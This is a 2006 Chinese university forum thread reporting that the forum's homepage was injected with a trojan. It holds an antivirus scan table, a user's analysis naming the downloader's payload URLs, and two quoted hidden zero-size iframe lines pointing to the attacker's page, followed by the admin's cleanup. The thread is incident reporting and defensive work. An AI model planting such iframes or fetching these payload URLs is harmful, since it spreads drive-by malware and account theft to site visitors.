碧海潮声大学生网

标题: 是不是有问题? [打印本页]
作者: 大麻哈鱼    时间: 2006-9-24 08:21
标题: 是不是有问题?

早晨8点发现的。

AntivirusVersionUpdateResult
AntiVir7.2.0.1809.23.2006HEUR/Crypted
Authentium4.93.809.23.2006 no virus found
Avast4.7.844.009.22.2006 no virus found
AVG38609.22.2006 no virus found
BitDefender7.209.23.2006GenPack:Generic.Malware.Sdld!.5D6BBD49
CAT-QuickHeal8.0009.22.2006(Suspicious) - DNAScan
ClamAVdevel-2006042609.23.2006 no virus found
eTrust-InoculateIT23.73.409.24.2006 no virus found
eTrust-Vet30.3.309309.22.2006 no virus found
DrWeb4.3309.22.2006 no virus found
Ewido4.009.23.2006Downloader.VB.akh
Fortinet2.82.0.009.23.2006suspicious
F-Prot3.16f09.23.2006 no virus found
F-Prot44.2.1.2909.23.2006 no virus found
Ikarus0.2.65.009.23.2006 no virus found
Kaspersky4.0.2.2409.24.2006 no virus found
McAfee485809.22.2006 no virus found
Microsoft1.156009.24.2006 no virus found
NOD32v21.177109.23.2006a variant of Win32/TrojanDownloader.VB.AKH
Norman5.80.0209.22.2006 no virus found
Panda9.0.0.409.23.2006Suspicious file
Sophos4.09.009.23.2006 no virus found
Symantec8.009.24.2006 no virus found
TheHacker6.0.1.07709.23.2006 no virus found
UNA1.8309.22.2006 no virus found
VBA323.11.109.23.2006 no virus found
VirusBuster4.3.7:909.23.2006 no virus found

作者: 大麻哈鱼    时间: 2006-9-24 08:41
原来是一个downloader,比较低级,taskmgr有进程。自身并未对注册表关键键值操作,运行后主动下载 htt p://ujdmk1.chinaw3.com/wow.exe htt p://www.10223.com/wm/zt.exe htt p://www.10223.com/vm/mh.exe htt p://www.10223.com/vm/jh.exe执行后,算完成使命。下次开机不再启动。
作者: 猩猩脖子疼    时间: 2006-9-24 10:12
MCAFEE 图 。
作者: 猩猩脖子疼    时间: 2006-9-24 10:20
[s:33]  [s:33]  [s:33]
作者: ~~爱爱~~    时间: 2006-9-24 10:31
什么东东............
作者: 猩猩脖子疼    时间: 2006-9-24 11:09
主页上挂脚本了。处理好了删我帖子
作者: starshow0571    时间: 2006-9-24 13:18
没看懂!!!!!!!
作者: jj空白    时间: 2006-9-24 14:18
不懂
作者: 我是誰    时间: 2006-9-24 14:58
晕死,楼主说的是,论坛首页被人挂木马了。
最后两句:
  2. <iframe src=&#39;[url]http://ujdmk1.chinaw3.com/xx.html[/url]&#39; width=&#39;0&#39; height=&#39;0&#39; scrolling=&#39;no&#39; frameborder=&#39;0&#39;></iframe>
  3. <iframe src=&#39;[url]http://ujdmk1.chinaw3.com/xx.html[/url]&#39; width=&#39;0&#39; height=&#39;0&#39; scrolling=&#39;no&#39; frameborder=&#39;0&#39;></iframe>
复制代码

大家小心!!
作者: 海院の水水    时间: 2006-9-24 15:34
貌似网马啊```
作者: 大麻哈鱼    时间: 2006-9-24 16:25

呵呵,wow玩的人要小心了。zt应该是征途吧。

作者: starshow0571    时间: 2006-9-24 18:07
呵呵!一个下载者啊!不过我没玩过这个玩意儿!
作者: 笨笨啊    时间: 2006-9-24 21:40
2006-09-24 01:24分被人修改了foot.htm

怀疑是虚拟站点上有其它站点被入侵


失职,刚回来,检查修复中
作者: 笨笨啊    时间: 2006-9-24 21:40
目前已修复,正在检查原因中
作者: 笨笨啊    时间: 2006-9-24 21:45
正在下载日志文件进行检查。
作者: 大麻哈鱼    时间: 2006-9-24 22:02
都是些盗号的,这人啊,
[mop874]
作者: 笨笨啊    时间: 2006-9-24 22:13
[mop011]

昨天一天的日记体积是200M

下载个半天,还搞得我flashfxp死机了

notepad打不开,editplus打不开
用ultraedit也打不开,结果发现,原来是文件损坏了,郁闷

重新下载
作者: 大麻哈鱼    时间: 2006-9-25 16:07
呵呵,我把这个的"作品"传上来,希望能提供一些线索,密码是 "virus".
问题既然已经解决,这个贴影响不好就del了吧。
作者: 笨笨啊    时间: 2006-9-25 16:50
晚上又有得忙了

唉~~
作者: starshow0571    时间: 2006-9-25 17:34
论坛被人挂马!汗!
怪不得我在黑吧有人说黑吧论坛有了漏洞,不会是PW论坛漏洞有了吧?
作者: 笨笨啊    时间: 2006-9-25 18:13
嗯,是的

论坛是早上01:24分中马的
后来到了晚上九点多回到家,接到电话,说论坛中马,偶做了临时措施屏蔽了一些敏感代码

今天收到通知,昨天晚上23:00已发布补丁

晚上装一下吧



欢迎光临 碧海潮声大学生网 (http://www.zjoubbs.com/) Powered by Discuz! X3.2